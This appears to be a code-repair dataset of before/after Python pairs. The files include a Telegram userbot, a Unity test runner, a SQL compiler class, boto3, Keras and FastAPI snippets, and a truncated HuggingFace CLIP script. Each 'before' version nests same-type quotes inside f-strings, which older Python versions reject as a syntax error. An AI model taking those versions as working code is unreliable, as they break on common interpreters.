return
url = get(f"https://dl.twrp.me/{device}/")
if url.status_code == 404:
reply = f"`Não foi possível achar downloads para {device}!`\n"
await request.edit(reply)
return
page = BeautifulSoup(url.content, "lxml")
download = page.find("table").find("tr").find("a")
dl_link = f"https://dl.twrp.me{download['href']}"
dl_file = download.text
size = page.find("span", {"class": "filesize"}).text
date = page.find("em").text.strip()
reply = (
f"**TWRP mais recente para {device}:**\n"
f"[{dl_file}]({dl_link}) - __{size}__\n"
f"**Atualizado:** __{date}__\n"
)
await request.edit(reply)
CMD_HELP.update(
{
"android": ".magisk\
\nÚltimas versões do Magisk\
\n\n.device <codenome>\
\nUso: Obtenha informações sobre codenome ou modelo do dispositivo.\
\n\n.codename <marca> <dispositivo>\
\nUso: Procure pelo codenome do dispositivo.\
\n\n.pixeldl **<download.pixelexperience.org>**\
\nUso: Download da ROM Pixel Experience pro seu servidor do userbot.\
\n\n.specs <marca> <dispositivo>\
\nUso: Obtenha especificações do dispositivo.\
\n\n.twrp <codenome>\
\nUso: Obtenha última versão do TWRP para o dispositivo."
}
)
|
import sys
import subprocess
from .yamato_utils import get_base_path, get_unity_executable_path
def main():
base_path = get_base_path()
print(f"Running in base path {base_path}")
unity_exe = get_unity_executable_path()
print(f"Starting tests via {unity_exe}")
test_args = [
unity_exe,
"-projectPath",
f"{base_path}/UnitySDK",
"-logfile",
"-",
"-batchmode",
"-executeMethod",
"MLAgents.StandaloneBuildTest.BuildStandalonePlayerOSX",
]
print(f"{" ".join(test_args)} ...")
timeout = 30 * 60 # 30 minutes, just in case
res: subprocess.CompletedProcess = subprocess.run(test_args, timeout=timeout)
if res.returncode == 0:
print("Test run SUCCEEDED!")
else:
print("Test run FAILED!")
sys.exit(res.returncode)
if __name__ == "__main__":
main()
| import sys
import subprocess
from .yamato_utils import get_base_path, get_unity_executable_path
def main():
base_path = get_base_path()
print(f"Running in base path {base_path}")
unity_exe = get_unity_executable_path()
print(f"Starting tests via {unity_exe}")
test_args = [
unity_exe,
"-projectPath",
f"{base_path}/UnitySDK",
"-logfile",
"-",
"-batchmode",
"-executeMethod",
"MLAgents.StandaloneBuildTest.BuildStandalonePlayerOSX",
]
print(f"{' '.join(test_args)} ...")
timeout = 30 * 60 # 30 minutes, just in case
res: subprocess.CompletedProcess = subprocess.run(test_args, timeout=timeout)
if res.returncode == 0:
print("Test run SUCCEEDED!")
else:
print("Test run FAILED!")
sys.exit(res.returncode)
if __name__ == "__main__":
main()
|
from Instrucciones.TablaSimbolos.Instruccion import Instruccion
from Instrucciones.Sql_create.Tipo_Constraint import Tipo_Constraint, Tipo_Dato_Constraint
from Instrucciones.Excepcion import Excepcion
#from storageManager.jsonMode import *
# Asocia la integridad referencial entre llaves foráneas y llaves primarias,
# para efectos de la fase 1 se ignora esta petición.
class AlterTableAddFK(Instruccion):
def __init__(self, tabla, lista_col, tabla_ref, lista_fk, strGram,linea, columna):
Instruccion.__init__(self,None,linea,columna,strGram)
self.tabla = tabla
self.lista_col = lista_col
self.tabla_ref = tabla_ref
self.lista_fk = lista_fk
def ejecutar(self, tabla, arbol):
super().ejecutar(tabla,arbol)
if arbol.bdUsar != None:
objetoTabla = arbol.devolviendoTablaDeBase(self.tabla)
if objetoTabla != 0:
tablaForanea = arbol.devolviendoTablaDeBase(self.tabla_ref)
if tablaForanea != 0:
listaTabla1 = []
tabla1Nombres = []
for c in self.lista_col:
for columnas in objetoTabla.lista_de_campos:
if columnas.nombre == c:
listaTabla1.append(columnas)
tabla1Nombres.append(columnas.nombre)
if(len(listaTabla1)==len(self.lista_col)):
listaForaneas = []
tabla2Nombres = []
for c in self.lista_fk:
for columnas in tablaForanea.lista_de_campos:
if columnas.nombre == c:
listaForaneas.append(columnas)
tabla2Nombres.append(columnas.nombre)
if(len(listaForaneas)==len(self.lista_fk)):
listaPrimarias = 0
for columna in listaForaneas:
if columna.constraint != None:
for i in columna.constraint:
if i.tipo == Tipo_Dato_Constraint.PRIMARY_KEY:
listaPrimarias += 1
else:
error = Excepcion('42P01',"Semántico","No hay restricción unique que coincida con las columnas dadas en la tabla referida «"+self.tabla_ref+"»",self.linea,self.columna)
arbol.excepciones.append(error)
arbol.consola.append(error.toString())
return
if listaPrimarias == len(self.lista_fk):
for c in range(0,len(listaTabla1)):
if listaTabla1[c].constraint != None:
restriccion = Tipo_Constraint(self.tabla+"_"+listaTabla1[c].nombre+"_fkey", Tipo_Dato_Constraint.FOREIGN_KEY, listaForaneas[c])
restriccion.referencia = self.tabla_ref
listaTabla1[c].constraint.append(restriccion)
else:
listaTabla1[c].constraint = []
restriccion = Tipo_Constraint(self.tabla+"_"+listaTabla1[c].nombre+"_fkey", Tipo_Dato_Constraint.FOREIGN_KEY, listaForaneas[c])
restriccion.referencia = self.tabla_ref
listaTabla1[c].constraint.append(restriccion)
arbol.consola.append("Consulta devuelta correctamente.")
print ("Consulta ALTER TABLE ADD FK devuleta correctamente")
else:
error = Excepcion('42P01',"Semántico","No hay restricción unique que coincida con las columnas dadas en la tabla referida «"+self.tabla_ref+"»",self.linea,self.columna)
arbol.excepciones.append(error)
arbol.consola.append(error.toString())
return
else:
lista = set(self.lista_fk) - set(tabla2Nombres)
#print(tabla2Nombres,self.lista_fk)
#print(lista)
for i in lista:
error = Excepcion('42P01',"Semántico","No existe la columna «"+i+"» en la llave",self.linea,self.columna)
arbol.excepciones.append(error)
arbol.consola.append(error.toString())
return
else:
lista = set(self.lista_col) - set(tabla1Nombres)
#print(tabla1Nombres,self.lista_col)
#print(lista)
for i in lista:
error = Excepcion('42P01',"Semántico","No existe la columna «"+i+"» en la llave",self.linea,self.columna)
arbol.excepciones.append(error)
arbol.consola.append(error.toString())
return
else:
error = Excepcion('42P01',"Semántico","No existe la relación "+self.tabla_ref,self.linea,self.columna)
arbol.excepciones.append(error)
arbol.consola.append(error.toString())
return error
else:
error = Excepcion('42P01',"Semántico","No existe la relación "+self.tabla,self.linea,self.columna)
arbol.excepciones.append(error)
arbol.consola.append(error.toString())
return error
else:
error = Excepcion("100","Semantico","No ha seleccionado ninguna Base de Datos.",self.linea,self.columna)
arbol.excepciones.append(error)
arbol.consola.append(error.toString())
def getCodigo(self, tabla, arbol):
tabla = f"{self.tabla}"
tabla2 = f"{self.tabla_ref}"
#tipo = f"{self.tipo}"
campos1 = f""
campos2 = f""
for item in self.lista_col:
campos1 += f"{item}{", " if self.lista_col.index(item) < len(self.lista_col) - 1 else ""}"
for item in self.lista_fk:
campos2 += f"{item}{", " if self.lista_fk.index(item) < len(self.lista_fk) - 1 else ""}"
table = f"ALTER TABLE {tabla} ADD FOREIGN KEY ({campos1}) REFERENCES {tabla2} ({campos2});"
num_params = 1
temp_param1 = arbol.getTemporal()
temp_tam_func = arbol.getTemporal()
temp_index_param1 = arbol.getTemporal()
temp_return = arbol.getTemporal()
temp_result = arbol.getTemporal()
codigo = f"\t#ALTER TABLE ADD FK 3D\n"
codigo += f"\t{temp_param1} = f\"{table}\"\n"
codigo += f"\t{temp_tam_func} = pointer + {num_params}\n"
codigo += f"\t{temp_index_param1} = {temp_tam_func} + 1\n"
codigo += f"\tstack[{temp_index_param1}] = {temp_param1}\n"
codigo += f"\tpointer = pointer + {num_params}\n"
codigo += f"\tinter()\n"
#codigo += f"\t{temp_return} = pointer + 0\n"
#codigo += f"\t{temp_result} = stack[{temp_return}]\n"
codigo += f"\tpointer = pointer - {num_params}\n"
#codigo += f"\tprint({temp_result})\n"
#arbol.consola.append(codigo)
return codigo
| from Instrucciones.TablaSimbolos.Instruccion import Instruccion
from Instrucciones.Sql_create.Tipo_Constraint import Tipo_Constraint, Tipo_Dato_Constraint
from Instrucciones.Excepcion import Excepcion
#from storageManager.jsonMode import *
# Asocia la integridad referencial entre llaves foráneas y llaves primarias,
# para efectos de la fase 1 se ignora esta petición.
class AlterTableAddFK(Instruccion):
def __init__(self, tabla, lista_col, tabla_ref, lista_fk, strGram,linea, columna):
Instruccion.__init__(self,None,linea,columna,strGram)
self.tabla = tabla
self.lista_col = lista_col
self.tabla_ref = tabla_ref
self.lista_fk = lista_fk
def ejecutar(self, tabla, arbol):
super().ejecutar(tabla,arbol)
if arbol.bdUsar != None:
objetoTabla = arbol.devolviendoTablaDeBase(self.tabla)
if objetoTabla != 0:
tablaForanea = arbol.devolviendoTablaDeBase(self.tabla_ref)
if tablaForanea != 0:
listaTabla1 = []
tabla1Nombres = []
for c in self.lista_col:
for columnas in objetoTabla.lista_de_campos:
if columnas.nombre == c:
listaTabla1.append(columnas)
tabla1Nombres.append(columnas.nombre)
if(len(listaTabla1)==len(self.lista_col)):
listaForaneas = []
tabla2Nombres = []
for c in self.lista_fk:
for columnas in tablaForanea.lista_de_campos:
if columnas.nombre == c:
listaForaneas.append(columnas)
tabla2Nombres.append(columnas.nombre)
if(len(listaForaneas)==len(self.lista_fk)):
listaPrimarias = 0
for columna in listaForaneas:
if columna.constraint != None:
for i in columna.constraint:
if i.tipo == Tipo_Dato_Constraint.PRIMARY_KEY:
listaPrimarias += 1
else:
error = Excepcion('42P01',"Semántico","No hay restricción unique que coincida con las columnas dadas en la tabla referida «"+self.tabla_ref+"»",self.linea,self.columna)
arbol.excepciones.append(error)
arbol.consola.append(error.toString())
return
if listaPrimarias == len(self.lista_fk):
for c in range(0,len(listaTabla1)):
if listaTabla1[c].constraint != None:
restriccion = Tipo_Constraint(self.tabla+"_"+listaTabla1[c].nombre+"_fkey", Tipo_Dato_Constraint.FOREIGN_KEY, listaForaneas[c])
restriccion.referencia = self.tabla_ref
listaTabla1[c].constraint.append(restriccion)
else:
listaTabla1[c].constraint = []
restriccion = Tipo_Constraint(self.tabla+"_"+listaTabla1[c].nombre+"_fkey", Tipo_Dato_Constraint.FOREIGN_KEY, listaForaneas[c])
restriccion.referencia = self.tabla_ref
listaTabla1[c].constraint.append(restriccion)
arbol.consola.append("Consulta devuelta correctamente.")
print ("Consulta ALTER TABLE ADD FK devuleta correctamente")
else:
error = Excepcion('42P01',"Semántico","No hay restricción unique que coincida con las columnas dadas en la tabla referida «"+self.tabla_ref+"»",self.linea,self.columna)
arbol.excepciones.append(error)
arbol.consola.append(error.toString())
return
else:
lista = set(self.lista_fk) - set(tabla2Nombres)
#print(tabla2Nombres,self.lista_fk)
#print(lista)
for i in lista:
error = Excepcion('42P01',"Semántico","No existe la columna «"+i+"» en la llave",self.linea,self.columna)
arbol.excepciones.append(error)
arbol.consola.append(error.toString())
return
else:
lista = set(self.lista_col) - set(tabla1Nombres)
#print(tabla1Nombres,self.lista_col)
#print(lista)
for i in lista:
error = Excepcion('42P01',"Semántico","No existe la columna «"+i+"» en la llave",self.linea,self.columna)
arbol.excepciones.append(error)
arbol.consola.append(error.toString())
return
else:
error = Excepcion('42P01',"Semántico","No existe la relación "+self.tabla_ref,self.linea,self.columna)
arbol.excepciones.append(error)
arbol.consola.append(error.toString())
return error
else:
error = Excepcion('42P01',"Semántico","No existe la relación "+self.tabla,self.linea,self.columna)
arbol.excepciones.append(error)
arbol.consola.append(error.toString())
return error
else:
error = Excepcion("100","Semantico","No ha seleccionado ninguna Base de Datos.",self.linea,self.columna)
arbol.excepciones.append(error)
arbol.consola.append(error.toString())
def getCodigo(self, tabla, arbol):
tabla = f"{self.tabla}"
tabla2 = f"{self.tabla_ref}"
#tipo = f"{self.tipo}"
campos1 = f""
campos2 = f""
for item in self.lista_col:
campos1 += f"{item}{', ' if self.lista_col.index(item) < len(self.lista_col) - 1 else ''}"
for item in self.lista_fk:
campos2 += f"{item}{', ' if self.lista_fk.index(item) < len(self.lista_fk) - 1 else ''}"
table = f"ALTER TABLE {tabla} ADD FOREIGN KEY ({campos1}) REFERENCES {tabla2} ({campos2});"
num_params = 1
temp_param1 = arbol.getTemporal()
temp_tam_func = arbol.getTemporal()
temp_index_param1 = arbol.getTemporal()
temp_return = arbol.getTemporal()
temp_result = arbol.getTemporal()
codigo = f"\t#ALTER TABLE ADD FK 3D\n"
codigo += f"\t{temp_param1} = f\"{table}\"\n"
codigo += f"\t{temp_tam_func} = pointer + {num_params}\n"
codigo += f"\t{temp_index_param1} = {temp_tam_func} + 1\n"
codigo += f"\tstack[{temp_index_param1}] = {temp_param1}\n"
codigo += f"\tpointer = pointer + {num_params}\n"
codigo += f"\tinter()\n"
#codigo += f"\t{temp_return} = pointer + 0\n"
#codigo += f"\t{temp_result} = stack[{temp_return}]\n"
codigo += f"\tpointer = pointer - {num_params}\n"
#codigo += f"\tprint({temp_result})\n"
#arbol.consola.append(codigo)
return codigo
|
import boto3
# Retrieve the list of existing buckets
s3 = boto3.client('s3')
response = s3.list_buckets()
# Output the bucket names
print('Existing buckets:')
for bucket in response['Buckets']:
print(f' {bucket['Name']}') | import boto3
# Retrieve the list of existing buckets
s3 = boto3.client('s3')
response = s3.list_buckets()
# Output the bucket names
print('Existing buckets:')
for bucket in response['Buckets']:
print(f' {bucket["Name"]}') |
import os
import numpy as np
import glob
import cv2, json
import argparse
from sklearn.utils import shuffle
from keras.optimizers import SGD, Adam
from keras.models import Sequential
from keras.layers import Dropout, Dense
from keras.callbacks import EarlyStopping, ModelCheckpoint
from keras.preprocessing import image
from keras.preprocessing.image import ImageDataGenerator
from keras import applications
from keras.applications.inception_v3 import InceptionV3
from keras.applications.inception_v3 import preprocess_input
from keras.layers import LSTM
from keras.models import load_model, Model
from sequence_data_generator import FramesSeqGenerator, FeaturesSeqGenerator
from data_generator import DataGenerator
from keras import backend as K
# BATCH_SIZE = 32
# SEED = 42
def extract_cnn_features(raw_data_dir, features_dir):
# base_model = InceptionV3(include_top=False, weights='imagenet', input_shape=(224, 224, 3))
# print("Base model shape")
# print(base_model.input_shape)
model = InceptionV3(weights='imagenet', include_top=True)
base_model = Model(inputs=model.input, outputs=model.get_layer('avg_pool').output)
_, height, width, channels = base_model.input_shape
frames = FramesSeqGenerator(raw_data_dir, BATCH_SIZE, 20, height, width, channels, False)
for i, video in frames.videos_list.iterrows():
video_name = video.frames_dir.split('/')[-1]
label = video.label
print(f'Video label = {label}')
features_path = f'{features_dir}/{label}/{video_name}.npy'
X, y = frames.generate(video)
print(f'X shape = {X.shape}')
features = base_model.predict(X)
print(f'features shape = {features.shape}')
if not os.path.exists(f'{features_dir}/{label}'):
os.makedirs(f'{features_dir}/{label}')
np.save(features_path, features)
return
def extract_cnn_features_all(raw_data_dir, features_dir):
model = InceptionV3(weights='imagenet', include_top=True)
base_model = Model(inputs=model.input, outputs=model.get_layer('avg_pool').output)
_, height, width, channels = base_model.input_shape
print(base_model.input_shape)
signs = sorted([name for name in os.listdir(raw_data_dir) if os.path.isdir(os.path.join(raw_data_dir, name))])
for sign in signs:
print("\nSign = {0}\n-------------------".format(sign))
videos = sorted([name for name in os.listdir(os.path.join(raw_data_dir, sign)) if os.path.isdir(os.path.join(raw_data_dir, sign, name))])
# For each video we will save the cnn features computed on each image
for video in videos:
print("Video = {0}".format(video))
features_path = f'{features_dir}/{sign}/{video}.npy'
if not os.path.exists(f'{features_dir}/{sign}'):
os.makedirs(f'{features_dir}/{sign}')
pathname = os.path.join(raw_data_dir, sign, video, '*.jpg')
imagenames = sorted(glob.glob(pathname))
featuresList = []
for imagename in imagenames:
img = image.load_img(imagename, target_size=(height, width))
img_data = image.img_to_array(img)
img_data = np.expand_dims(img_data, axis=0)
img_data = preprocess_input(img_data)
inceptionv3_feature = base_model.predict(img_data)
featuresList.append(inceptionv3_feature)
stackedFeatures = np.vstack(featuresList)
np.save(features_path, stackedFeatures)
print("{0} images processed\n".format(len(featuresList)))
def train_lstm(features_path, epochs, num_features, num_classess):
model = Sequential()
model.add(LSTM(num_features, dropout=0.2, input_shape=(20, num_features), return_sequences=True))
model.add(LSTM(num_features * 1, return_sequences=False))
model.add(Dense(num_classess, activation='softmax'))
optimizer = Adam(lr=1e-4)
model.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=['accuracy'])
# callbacks = [EarlyStopping(monitor='val_loss', patience=10, verbose=0), ModelCheckpoint('video_1_LSTM_1_1024.h5', monitor='val_loss', save_best_only=True, verbose=0)]
callbacks = [ModelCheckpoint('video_1_LSTM_1_1024.h5', monitor='val_loss', save_best_only=True, verbose=0)]
train_features = FeaturesSeqGenerator(features_path + '/train', BATCH_SIZE, model.input_shape[1:])
val_features = FeaturesSeqGenerator(features_path + '/test', BATCH_SIZE, model.input_shape[1:])
model.fit_generator(generator=train_features,
validation_data=val_features,
epochs=int(epochs),
workers=1,
use_multiprocessing=False,
verbose=1,
callbacks=callbacks)
return model
def train_lstm_jittered(features_path, sequencelength, epochs, num_features, num_classess):
model = Sequential()
model.add(LSTM(2048, return_sequences=False,input_shape=(sequencelength, num_features),dropout=0.5))
model.add(Dense(512, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classess, activation='softmax'))
optimizer = Adam(lr=1e-4)
metrics = ['accuracy']
model.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=metrics)
callbacks = [ModelCheckpoint('video_LSTM.h5', monitor='val_loss', save_best_only=True, verbose=1)]
data_path, batch_size, featureLength, shuffle = 'cnn_features/train', 32, 2048, True
train_gen = DataGenerator(data_path,
batch_size=batch_size,
featureLength=featureLength,
seqLength=sequencelength,
shuffle=shuffle)
data_path, batch_size, featureLength, shuffle = 'cnn_features/test', 16, 2048, False
val_gen = DataGenerator(data_path,
batch_size=batch_size,
featureLength=featureLength,
seqLength=sequencelength,
shuffle=shuffle)
model.fit_generator(generator=train_gen,
validation_data=val_gen,
epochs=int(epochs),
workers=1,
use_multiprocessing=False,
verbose=1,
callbacks=callbacks)
return model
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Train CNN+LSTM model for short video snippets')
parser.add_argument('--data-path', default='processed_data', required=False, help='path to the train and test directories')
parser.add_argument('--lstm-epochs', default=100, required=False, help='number of LSTM epochs')
parser.add_argument('--reload-cnn-features', default=True, required=False, help='re-extract CNN features from frames')
parser.add_argument('--features-path', default='cnn_features', required=False, help='extracted CNN features path')
args = vars(parser.parse_args())
print(args)
if args.get('data_path') is None:
print('Please provide path to video frames')
exit()
# GPU configuration
# K.tensorflow_backend._get_available_gpus()
# config = tf.ConfigProto( device_count = {'GPU': 200, 'CPU': 4} )
# sess = tf.Session(config=config)
# keras.backend.set_session(sess)
# extract_cnn_features(f'{args['data_path']}/train', f'{args['features_path']}/train')
# extract_cnn_features(f'{args['data_path']}/test', f'{args['features_path']}/test')
# extract_cnn_features_all(f'{args['data_path']}/train', f'{args['features_path']}/train')
# extract_cnn_features_all(f'{args['data_path']}/test', f'{args['features_path']}/test')
# model = train_lstm(args['features_path'], args['lstm_epochs'], num_features, num_classes)
num_features = 2048
num_classes = len(os.listdir(f'{args['features_path']}/train'))
seqLength = 10
model = train_lstm_jittered(args['features_path'], seqLength, args['lstm_epochs'], num_features, num_classes)
# model.save("final_model.h5")
| import os
import numpy as np
import glob
import cv2, json
import argparse
from sklearn.utils import shuffle
from keras.optimizers import SGD, Adam
from keras.models import Sequential
from keras.layers import Dropout, Dense
from keras.callbacks import EarlyStopping, ModelCheckpoint
from keras.preprocessing import image
from keras.preprocessing.image import ImageDataGenerator
from keras import applications
from keras.applications.inception_v3 import InceptionV3
from keras.applications.inception_v3 import preprocess_input
from keras.layers import LSTM
from keras.models import load_model, Model
from sequence_data_generator import FramesSeqGenerator, FeaturesSeqGenerator
from data_generator import DataGenerator
from keras import backend as K
# BATCH_SIZE = 32
# SEED = 42
def extract_cnn_features(raw_data_dir, features_dir):
# base_model = InceptionV3(include_top=False, weights='imagenet', input_shape=(224, 224, 3))
# print("Base model shape")
# print(base_model.input_shape)
model = InceptionV3(weights='imagenet', include_top=True)
base_model = Model(inputs=model.input, outputs=model.get_layer('avg_pool').output)
_, height, width, channels = base_model.input_shape
frames = FramesSeqGenerator(raw_data_dir, BATCH_SIZE, 20, height, width, channels, False)
for i, video in frames.videos_list.iterrows():
video_name = video.frames_dir.split('/')[-1]
label = video.label
print(f'Video label = {label}')
features_path = f'{features_dir}/{label}/{video_name}.npy'
X, y = frames.generate(video)
print(f'X shape = {X.shape}')
features = base_model.predict(X)
print(f'features shape = {features.shape}')
if not os.path.exists(f'{features_dir}/{label}'):
os.makedirs(f'{features_dir}/{label}')
np.save(features_path, features)
return
def extract_cnn_features_all(raw_data_dir, features_dir):
model = InceptionV3(weights='imagenet', include_top=True)
base_model = Model(inputs=model.input, outputs=model.get_layer('avg_pool').output)
_, height, width, channels = base_model.input_shape
print(base_model.input_shape)
signs = sorted([name for name in os.listdir(raw_data_dir) if os.path.isdir(os.path.join(raw_data_dir, name))])
for sign in signs:
print("\nSign = {0}\n-------------------".format(sign))
videos = sorted([name for name in os.listdir(os.path.join(raw_data_dir, sign)) if os.path.isdir(os.path.join(raw_data_dir, sign, name))])
# For each video we will save the cnn features computed on each image
for video in videos:
print("Video = {0}".format(video))
features_path = f'{features_dir}/{sign}/{video}.npy'
if not os.path.exists(f'{features_dir}/{sign}'):
os.makedirs(f'{features_dir}/{sign}')
pathname = os.path.join(raw_data_dir, sign, video, '*.jpg')
imagenames = sorted(glob.glob(pathname))
featuresList = []
for imagename in imagenames:
img = image.load_img(imagename, target_size=(height, width))
img_data = image.img_to_array(img)
img_data = np.expand_dims(img_data, axis=0)
img_data = preprocess_input(img_data)
inceptionv3_feature = base_model.predict(img_data)
featuresList.append(inceptionv3_feature)
stackedFeatures = np.vstack(featuresList)
np.save(features_path, stackedFeatures)
print("{0} images processed\n".format(len(featuresList)))
def train_lstm(features_path, epochs, num_features, num_classess):
model = Sequential()
model.add(LSTM(num_features, dropout=0.2, input_shape=(20, num_features), return_sequences=True))
model.add(LSTM(num_features * 1, return_sequences=False))
model.add(Dense(num_classess, activation='softmax'))
optimizer = Adam(lr=1e-4)
model.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=['accuracy'])
# callbacks = [EarlyStopping(monitor='val_loss', patience=10, verbose=0), ModelCheckpoint('video_1_LSTM_1_1024.h5', monitor='val_loss', save_best_only=True, verbose=0)]
callbacks = [ModelCheckpoint('video_1_LSTM_1_1024.h5', monitor='val_loss', save_best_only=True, verbose=0)]
train_features = FeaturesSeqGenerator(features_path + '/train', BATCH_SIZE, model.input_shape[1:])
val_features = FeaturesSeqGenerator(features_path + '/test', BATCH_SIZE, model.input_shape[1:])
model.fit_generator(generator=train_features,
validation_data=val_features,
epochs=int(epochs),
workers=1,
use_multiprocessing=False,
verbose=1,
callbacks=callbacks)
return model
def train_lstm_jittered(features_path, sequencelength, epochs, num_features, num_classess):
model = Sequential()
model.add(LSTM(2048, return_sequences=False,input_shape=(sequencelength, num_features),dropout=0.5))
model.add(Dense(512, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classess, activation='softmax'))
optimizer = Adam(lr=1e-4)
metrics = ['accuracy']
model.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=metrics)
callbacks = [ModelCheckpoint('video_LSTM.h5', monitor='val_loss', save_best_only=True, verbose=1)]
data_path, batch_size, featureLength, shuffle = 'cnn_features/train', 32, 2048, True
train_gen = DataGenerator(data_path,
batch_size=batch_size,
featureLength=featureLength,
seqLength=sequencelength,
shuffle=shuffle)
data_path, batch_size, featureLength, shuffle = 'cnn_features/test', 16, 2048, False
val_gen = DataGenerator(data_path,
batch_size=batch_size,
featureLength=featureLength,
seqLength=sequencelength,
shuffle=shuffle)
model.fit_generator(generator=train_gen,
validation_data=val_gen,
epochs=int(epochs),
workers=1,
use_multiprocessing=False,
verbose=1,
callbacks=callbacks)
return model
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Train CNN+LSTM model for short video snippets')
parser.add_argument('--data-path', default='processed_data', required=False, help='path to the train and test directories')
parser.add_argument('--lstm-epochs', default=100, required=False, help='number of LSTM epochs')
parser.add_argument('--reload-cnn-features', default=True, required=False, help='re-extract CNN features from frames')
parser.add_argument('--features-path', default='cnn_features', required=False, help='extracted CNN features path')
args = vars(parser.parse_args())
print(args)
if args.get('data_path') is None:
print('Please provide path to video frames')
exit()
# GPU configuration
# K.tensorflow_backend._get_available_gpus()
# config = tf.ConfigProto( device_count = {'GPU': 200, 'CPU': 4} )
# sess = tf.Session(config=config)
# keras.backend.set_session(sess)
# extract_cnn_features(f'{args["data_path"]}/train', f'{args["features_path"]}/train')
# extract_cnn_features(f'{args["data_path"]}/test', f'{args["features_path"]}/test')
# extract_cnn_features_all(f'{args["data_path"]}/train', f'{args["features_path"]}/train')
# extract_cnn_features_all(f'{args["data_path"]}/test', f'{args["features_path"]}/test')
# model = train_lstm(args['features_path'], args['lstm_epochs'], num_features, num_classes)
num_features = 2048
num_classes = len(os.listdir(f'{args["features_path"]}/train'))
seqLength = 10
model = train_lstm_jittered(args['features_path'], seqLength, args['lstm_epochs'], num_features, num_classes)
# model.save("final_model.h5")
|
from fastapi import Depends, FastAPI
from fastapi.security import OAuth2PasswordBearer
import os
app = FastAPI()
oauth2_scheme = OAuth2PasswordBearer(tokenUrl="token")
@app.get("/items/")
async def read_items(token: str = Depends(oauth2_scheme)):
return {"token": token}
if __name__ == '__main__':
print(f'INFO: Starting the FASTAPI server...')
print(f'INFO: DOCS on: http://127.0.0.1:11111/docs')
os.system(f"uvicorn {(__file__.split("/")[-1]).split(".")[0]}:app --host 127.0.0.1 --port 11111")
| from fastapi import Depends, FastAPI
from fastapi.security import OAuth2PasswordBearer
import os
app = FastAPI()
oauth2_scheme = OAuth2PasswordBearer(tokenUrl="token")
@app.get("/items/")
async def read_items(token: str = Depends(oauth2_scheme)):
return {"token": token}
if __name__ == '__main__':
print(f'INFO: Starting the FASTAPI server...')
print(f'INFO: DOCS on: http://127.0.0.1:11111/docs')
os.system(f"uvicorn {(__file__.split('/')[-1]).split('.')[0]}:app --host 127.0.0.1 --port 11111")
|
#!/usr/bin/env python
# coding=utf-8
# Copyright 2022 The HuggingFace Team All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Training a CLIP like dual encoder models using text and vision encoders in the library.
The script can be used to train CLIP like models for languages other than English by using
a text encoder pre-trained in the desired language. Currently this script supports the following vision
and text models:
Vision models: ViT(https://huggingface.co/models?filter=vit), CLIP (https://huggingface.co/models?filter=clip)
Text models: BERT, ROBERTa (https://huggingface.co/models?filter=fill-mask)
"""
import logging
import os
import sys
from dataclasses import dataclass, field
from typing import Optional
import torch
from datasets import load_dataset
from PIL import Image
from torchvision.io import ImageReadMode, read_image
from torchvision.transforms import CenterCrop, ConvertImageDtype, Normalize, Resize
from torchvision.transforms.functional import InterpolationMode
import transformers
from transformers import (
AutoFeatureExtractor,
AutoModel,
AutoTokenizer,
HfArgumentParser,
Trainer,
TrainingArguments,
set_seed,
)
from transformers.trainer_utils import get_last_checkpoint
from transformers.utils import check_min_version
from transformers.utils.versions import require_version
logger = logging.getLogger(__name__)
# Will error if the minimal version of Transformers is not installed. Remove at your own risks.
check_min_version("4.18.0.dev0")
require_version("datasets>=1.8.0", "To fix: pip install -r examples/pytorch/contrastive-image-text/requirements.txt")
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch.
"""
model_name_or_path: str = field(
metadata={"help": "Path to pretrained model or model identifier from huggingface.co/models"},
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
feature_extractor_name: str = field(default=None, metadata={"help": "Name or path of preprocessor config."})
cache_dir: Optional[str] = field(
default=None, metadata={"help": "Where do you want to store the pretrained models downloaded from s3"}
)
model_revision: str = field(
default="main",
metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
)
use_fast_tokenizer: bool = field(
default=True,
metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."},
)
use_auth_token: bool = field(
default=False,
metadata={
"help": "Will use the token generated when running `transformers-cli login` (necessary to use this script "
"with private models)."
},
)
freeze_vision_model: bool = field(
default=False, metadata={"help": "Whether to freeze the vision model parameters or not."}
)
freeze_text_model: bool = field(
default=False, metadata={"help": "Whether to freeze the text model parameters or not."}
)
@dataclass
class DataTrainingArguments:
"""
Arguments pertaining to what data we are going to input our model for training and eval.
"""
dataset_name: Optional[str] = field(
default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."}
)
dataset_config_name: Optional[str] = field(
default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."}
)
data_dir: Optional[str] = field(default=None, metadata={"help": "The data directory containing input files."})
image_column: Optional[str] = field(
default="image_path",
metadata={"help": "The name of the column in the datasets containing the full image file paths."},
)
caption_column: Optional[str] = field(
default="caption",
metadata={"help": "The name of the column in the datasets containing the image captions."},
)
train_file: Optional[str] = field(
default=None, metadata={"help": "The input training data file (a jsonlines file)."}
)
validation_file: Optional[str] = field(
default=None,
metadata={"help": "An optional input evaluation data file (a jsonlines file)."},
)
max_seq_length: Optional[int] = field(
default=128,
metadata={
"help": "The maximum total input sequence length after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded."
},
)
max_train_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of training examples to this "
"value if set."
},
)
max_eval_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of evaluation examples to this "
"value if set."
},
)
overwrite_cache: bool = field(
